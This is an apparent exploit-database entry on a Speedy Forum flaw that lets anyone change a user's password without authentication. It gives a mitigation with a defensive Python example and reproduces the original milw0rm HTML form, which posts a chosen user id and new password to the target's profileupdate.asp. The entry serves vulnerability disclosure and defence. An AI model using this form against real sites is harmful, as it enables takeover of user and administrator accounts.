Vendor: User Pass Change
By: ajann
CVSS: 7.5 (HIGH)
CWE: 287
Product Name: User Pass Change
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Speedy Forum User Pass Change

This exploit allows an attacker to change the password of a Speedy Forum user by submitting a form with the user's name, email, ID, country, password, and re-password. The form is processed without any authentication or authorization checks, so an attacker can change the user's password without their knowledge.

Mitigation:

Implement authentication and authorization checks on the form to ensure that only authorized users can change the user's password.
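
One way to apply this mitigation on the server side, as an added example written in Python (it is not code from Speedy Forum or from the original advisory). The field names id, password and passwordre come from the form on this page; the session key user_id, the current_password field, the in-memory user store and the PBKDF2 parameters are assumptions made for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed PBKDF2 work factor for this example


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", str(password).encode("utf-8"), salt, ITERATIONS)


def make_user(password):
    """Build a constructed user record for the stand-in store."""
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


def handle_profile_update(session, form, users):
    """Server-side checks for a profileupdate-style request.

    session: server-side session state (hypothetical key: user_id)
    form:    untrusted POST fields (id, password, passwordre as on the page;
             current_password is an assumed extra field)
    users:   stand-in store {user_id: {"salt": bytes, "hash": bytes}}
    Returns (http_status, message).
    """
    # Authentication: without a logged-in session nothing is changed.
    uid = session.get("user_id")
    if uid is None or uid not in users:
        return 401, "login required"
    # Authorization: the target account comes from the session. A posted
    # "id" naming another account is rejected instead of being trusted.
    if "id" in form and str(form["id"]) != str(uid):
        return 403, "cannot edit another account"
    # Re-authentication: the current password must match before it is replaced.
    user = users[uid]
    supplied = hash_password(form.get("current_password", ""), user["salt"])
    if not hmac.compare_digest(supplied, user["hash"]):
        return 403, "current password incorrect"
    new = str(form.get("password", ""))
    if len(new) < 8 or new != str(form.get("passwordre", "")):
        return 400, "new password too short or confirmation mismatch"
    user["salt"] = os.urandom(16)
    user["hash"] = hash_password(new, user["salt"])
    return 200, "password changed"
```
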
Source

Exploit-DB raw data:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>

<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User 
Name    
:   </b></font>
<input type="text" name="name" value="" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname 
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User 
Mail        
:  </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">   Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>

<font face="Verdana" size="2" color="#FF0000"><b>User 
İd            
:  </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">  Example: İd:1 
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country  :  
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: 
Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">      
:  </font></b>

<input type="text" name="password" value="Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">  
:  </font></b>

<input type="text" name="passwordre" value="Re Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action    : 
</b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>

<p>

<input type="submit" name="Submit" value="Change"> </p>

<br>

 </form>

</div></body></html>

# milw0rm.com [2006-05-29]